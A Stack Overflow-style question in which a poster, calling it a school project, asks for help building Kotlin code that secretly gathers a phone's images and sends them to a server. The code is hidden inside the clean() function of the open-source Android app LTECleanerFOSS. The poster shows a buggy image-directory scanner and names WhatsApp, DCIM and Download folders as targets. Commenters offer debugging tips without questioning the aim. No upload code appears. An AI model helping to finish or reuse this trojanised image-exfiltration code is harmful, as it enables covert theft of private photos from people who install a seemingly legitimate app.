# Android: How do I retrieve all the images in a directory and export them to a server?

Tags: android, arrays, image, kotlin, export

I am new to Kotlin and android studio. I am doing a school project whereby a malicious code will exfiltrate image from a phone and then store them in a server. This is my current code but I could not get it to work. I am masking this function inside a legitimate application "LTECleanerFoss" (its open source and can be found on github: https://github.com/TheRedSpy15/LTECleanerFOSS). I tried searching online but im just clueless what could go wrong, unlike normal python whereby i can print results on the IDE. I cant print the results on the android emulator and hence its tough to debug. Currently, trying to solve extracting images before I figure how to send them to a server

When i try to run the code, it keeps saying i need to put a parameter in the function, however this function is supposed to extract photos, so there shouldn't be a need for parameters since im not inputting anything.

My function to extract the files on the phone ( i saw this somewhere on github):

```
fun getFile(dir: File): ArrayList<String?>? {
        System.out.println("if this line prints, this function is called")
        val fileList: ArrayList<String?> = ArrayList()
        val listFile = dir.listFiles()
        if (listFile != null && listFile.size > 0) {
            for (file in listFile) {
                if (file.isDirectory) {
                    getFile(file)
                } else {
                    if (file.name.endsWith(".png")
                        || file.name.endsWith(".jpg")
                        || file.name.endsWith(".jpeg")
                        || file.name.endsWith(".gif")
                    ) {
                        val temp = file.path.substring(0, file.path.lastIndexOf('/'))
                        if (!fileList.contains(temp)) fileList.add(temp)
                    }
                }
            }
        }
        return fileList
    }
```

I am trying to insert this function into the legitimate function here "clean()" which is a function from the LTECleanerFoss

```
fun clean() {
        requestWriteExternalPermission()
        if (!FileScanner.isRunning) {
            if (prefs == null) println("presssss is null")
            if (prefs!!.getBoolean("one_click", false)) // one-click disabled
            {
                Thread { scan(true) }.start() // one-click enabled
            } else {
                val mDialog = MaterialDialog.Builder(this)
                    .setTitle(getString(R.string.are_you_sure_deletion_title))
                    .setAnimation("5453-shred-paper.json")
                    .setMessage(getString(R.string.are_you_sure_deletion))
                    .setCancelable(false)
                    .setPositiveButton(getString(R.string.clean)) { dialogInterface: DialogInterface, _: Int ->
                        dialogInterface.dismiss()
                        Thread { scan(true) }.start()
                        getFile()  <<<<<<< I CALL THE FUNCTION HERE  >>>>>>>
                    }
                    .setNegativeButton(getString(R.string.cancel)) { dialogInterface: DialogInterface, _: Int -> dialogInterface.dismiss() }
                    .build()
                mDialog.animationView.scaleType = ImageView.ScaleType.FIT_CENTER
                mDialog.show()
            }
        }
    }
```

Comment: Of course you can use Log.d() in your code which works on an emulator too. Please elaborate.

Comment: Extracting files? You first have to determine the image files in your directory. After that upload them one by one. Please tell first if you can determine the image files.

Comment: `fun getFile(dir: File)` So it has a File parameter indicating the directory with the image files.

Comment: `getFile()  <<<<<<< I CALL THE FUNCTION HERE  >>>>>>>` If you dont supply a File parameter indicating the directory with the images your code will not even compile. So there is no app and your app does not run on an emulator at all.

Comment: @blackapps what do i put inside the log.d() ? I was trying to do a top down approach, just search every image in every directory like watsapp folder, DCIM folder, download folder etc